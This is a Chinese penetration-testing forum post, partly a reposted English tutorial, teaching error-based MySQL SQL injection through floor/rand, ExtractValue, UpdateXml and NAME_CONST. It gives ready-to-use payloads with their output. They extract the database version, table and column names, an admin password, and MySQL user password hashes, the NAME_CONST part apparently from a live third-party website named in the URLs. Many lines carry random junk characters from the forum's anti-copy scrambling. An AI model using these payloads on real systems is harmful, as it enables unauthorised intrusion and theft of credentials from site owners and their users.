中国网络渗透测试联盟
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法 [打印本页]
作者: admin 时间: 2015-11-11 19:03
标题: mysql ,floor,ExtractValue,UpdateXml三种报错模式注入利用方法
1、通过floor报错
可以通过如下一些利用代码
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
举例如下:
7 ]' ~- {# ~& X# r$ y2 I首先进行正常查询:
mysql> select * from article where id = 1;
' g4 g! b I3 C- d9 j' r/ v+—-+——-+———+
3 k1 K/ ?0 z# z" J2 @6 {# w| id | title | content |
' @. M5 @- U9 S( u& B+—-+——-+———+; b7 m; U/ ?1 _1 ?9 O2 Y6 _- L& O
| 1 | test | do it |3 U( n3 s1 E: r3 c; v
+—-+——-+———+
假如id输入存在注入的话,可以通过如下语句进行报错。
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
6 C! n. p: @9 L8 i$ q+ M% pERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。* v/ M9 c! H7 p; A O! `
例如我们需要查询管理员用户名和密码:
Method1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
( v& Q \% ]# Z+ x: _ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
Method2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));' K4 I. e1 }! k, a1 s( z
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’
2、ExtractValue
/ F/ I/ u- I* O1 u! q4 a; ~测试语句如下
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–3 G' A$ I# w8 z/ d) n/ B
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′
3、UpdateXml
测试语句
and 1=(updatexml(1,concat(0x3a,(select user())),1))
实际测试过程
mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
8 I: q& e6 f4 e- z. y* |3 r; x, O6 L0 x1 g7 ]. Q; O1 L; u2 S6 h
再收集:
# o6 ^" p q6 F+ f, [5 ~) z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) : d3 [5 e0 r- F& Y# U
9 ~. L" ]. { b0 u) \. q8 o8 {Error
uplicate column name ‘5.0.27-community-nt’Error
uplicate column name ‘5.0.27-community-nt’& C2 m3 Y, P. ]! @" h$ _
+ [( E& k# c' q
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
+ j! {: c% A: U) x
, m/ }: y$ l; O+ P! L* LError
uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error
uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
( q/ @4 x1 U0 ^2 U9 d' y9 {
3 v- H l# a4 z/ F hMYSQL高版本报错注入技巧-利用NAME_CONST注入% f, x7 G5 }4 W4 u2 E$ |+ U
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
/ b, \* N) n: l4 N( c* S- {' F0 h1 d! O7 u- d- N6 a2 _
9 M8 Q6 B" q9 T# b1 {$ j相关信息
6 V. n( {( L2 U& I9 \% S
3 M9 Z; `+ G9 _2 Z, {- [2 p2 vNAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
# {0 f; I+ E5 d5 [5 }( m: F
, H1 g; B6 P8 c; j! M3 N0 A: YCode:
) \6 d. ~5 l/ W. H BNAME_CONST(DATA, VALUE)/ o1 c9 T& \/ `* V6 [# P
: M5 C4 v' f9 G) z5 i. x: J3 mReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.7 V4 L/ _2 \- \# G) z# L0 m: Z
! ?$ ]* B5 f6 I% N8 W" ], ESELECT NAME_CONST('TEST', 1)! a3 o8 [7 o7 I
. b$ h/ F/ m; m `+ L. w Z2 _$ |# N( X! M- \2 M: f
: P7 s& {! @% E0 Z- }|---------------|
! V/ N4 @, Q( X0 o| TEST |
. e, C# o# T) K8 \$ |1 k| |
% q' p3 x6 K% E f! w6 S5 V3 O|---------------|
& `+ P) I' ^' q9 I| 1 |. Z/ l) n8 h" u& M9 i8 N( Z
| |
. Y5 `6 w$ a5 t# E: E|---------------|: J2 j e2 G. W" j& t0 S
' K. H. ]& H6 p' A3 k3 m: `& a
: d n' [% o+ S' I" Z0 |9 C1 F% `: T# {! J# z% c) @) K
( n0 k+ d( W! W; p
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
6 v6 J" L* U0 l# o" ^: U# kIntro to MySQL Variables2 \+ ~2 }, \" \4 F
& w6 l7 D3 c ?, e
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.( k1 H# S4 B! N9 W6 d# m
3 ?: D2 n- o; t; C
Code:
1 e$ {6 D/ m% A6 ?7 n- n2 ~http://www.baido.hk/qcwh/content ... ;sid=19&cid=261" k! h7 V% u, @
7 c. A. G4 h0 ]4 p$ K
- u# D8 r( C2 Y2 Q5 B2 _$ S
! [ |: W' w1 d9 p# @ s
! F- N2 i/ E' N. g1 X; y% ^+ ^9 a2 e" _4 H% w+ \; N* n
Code:
% g8 r: A$ \6 O( B E D dand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--$ y, j! w+ v R; q
y4 u% Q& d) p0 s
7 H! T) x% T* L4 K% W- D
VAR = Your MySQL variable.$ t G6 U4 a) }1 `8 ~4 q- i
) @3 J9 ~8 U' z5 b4 G/ {
MySQL 5.1.3 Server System Variables7 x/ e6 M1 k; {9 J; L9 r) A. v, k
# {, E. U' U! U6 x! E: x& O, c
Let's try it out on my site..3 u3 h0 p9 D5 Z' O! t( K6 l7 R
: V' F, }2 W, l3 H/ h
Code: H5 C% C) j* d B
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
) F- `, P5 m' M0 p. n& ~1 k
0 z* j8 I9 R. d) L. w3 BError
uplicate column name '5.0.27-community-nt' r$ { D$ R, p0 |
3 d( g- E3 V% W
% u4 z0 Q+ K; k- W* e
1 z" _. ~, m( x2 W& U. g4 o
1 M3 Y5 k1 N) f- G) h: C ?4 r: H* ~
/ [+ r# V* a/ P9 \Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...% f" Q. [& ]5 o5 V7 H
: b# s! }- O- m" v3 d8 O5 IData Extraction
. P4 g% K, f$ p! Q% h& K' C! G5 k5 s6 t
Code:1 T# t8 @5 _; z6 K$ D
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--0 O5 r# @" |/ R# l S) X( u: ~5 R
- j9 Q$ ?1 Z% D4 E; [' {; ?" r/ ]" F
1 k3 V& h0 }6 ?5 B m
We should get a duplicate column 1 error...
}- a9 ^& ?* A6 T. J) Q: t
0 j4 x# T- B" ]; UCode:9 u4 p( m4 O1 [7 Y5 @. c
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
' Y$ e, Q( {. Y) B5 }3 r0 J |5 C; J6 w! w* W
Error
uplicate column name '1
1 N- J- \- q+ g' F4 u
?+ r. |, E9 j7 V/ z, F( U4 S
) _# Z1 H2 s5 h6 v( E7 g0 H. J& |1 s
0 n8 e7 r; W2 k2 l
* `* P' t4 c! C' o. ]( J2 m
- L5 b7 Z. Z+ ?' w6 _% q- zNow let's get the tables out this bitch..
6 g$ R$ w) b: y5 N
0 @( e' t3 X" ~' `2 qCode:3 {( C! q3 p! b. [3 e& |
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--9 O( T& f: ]4 v. `8 T* D
* O6 R- k$ T5 Z$ u* z8 Z7 x3 f
6 v+ H# l$ c4 Q, @
Let's see if it works here, if it does, we can go on and finish the job.) q2 o9 }- S, x- L3 y, S8 M$ Z0 Z
0 ~3 d. p: h. r; U# K- i+ N4 aCode:
$ B1 q7 _. W& @* s. z) Whttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
: y2 v; ]) N- ]$ v: f
% W( m6 ]# F R8 m4 j( g: Y- v6 l& a
Error
uplicate column name 'com_admanage3 O8 P8 S4 o- \: B
/ q! s6 w* G O2 s
. b2 V! q3 {3 b0 v3 Q
$ n, E. ?' P2 ?
! _9 v& M# v3 ]
" i' J5 d. T2 w6 L, `4 h3 a& m3 I
3 }" F- k* v, Y: z* P
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
S8 @7 P$ r8 l6 I F" K! D- @! \. ]8 [' J4 Q4 m
Let's get the columns out of the user table..8 q1 u! w% E, M4 R
) c+ w1 A4 H; o7 Q) G2 N
Code:
$ L2 m% g& H6 \+ ? L) n+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--9 v* x6 r8 y. [
+ b( C" T4 J: ~
! |; ~$ b" s2 H' P; VSo mine looks like this, and I get the duplicate column name 'Host'.
. g$ W4 w% \' x0 P% i1 i- _0 v; m0 Y R" e
Code:
, g K5 Y1 {& u' L- J; Whttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
. T3 P! d* j9 a% r9 @' T! c
% Z7 u Y) n: j4 \2 [9 v2 J: FError
uplicate column name 'Host'
! W+ K' V; s$ N, ~" i5 c h1 s7 `/ W: \# z& `7 |5 {8 ?3 r" Q7 y
9 b. k+ W3 I7 ~( m$ b
9 g; w1 }6 e1 q) b. F- I# k' t* H; o) _$ H/ x, R; J0 F+ x t3 s5 l1 k
/ H: l+ T( J; v! m& U- c$ F, ]: S$ @1 `3 n! d( E
Woot, time to finish this bitch off.& ` G& O; W1 b. R; D
) @- ?, y3 i0 _+ d3 k1 sCode:
! d3 [' k& o: R+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--# q$ r1 \# l) C8 c j5 R
1 L6 N& q% `+ N6 L* c
) Q) M# [" O+ dSo mine looks like this...
- D9 @) U2 ] P: r! a; [! \) {, C% U8 k3 R
Code:2 t( L6 n4 ]4 {) U, W2 x
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--4 @4 q' Q. H) \: | i! ~. L# ~
7 G2 B3 }8 E+ A4 s& z
Error
uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
, U q) J. Z R# i: v6 o3 U8 N4 b) K8 n
# L! B* Q4 K% I9 M7 M W! o
# F7 K/ \# L4 H7 V4 d3 \0 ~" \
9 z' P9 }- J" R- X. n# t
2 T- T+ Z5 |" }: i- e8 Q, y
; J" y' x1 y: i; WAnd there we have it, thanks for reading.
( U: p" h# f/ X- `& ?
9 [" ?; o0 @& w
| 欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) |
Powered by Discuz! X3.2 |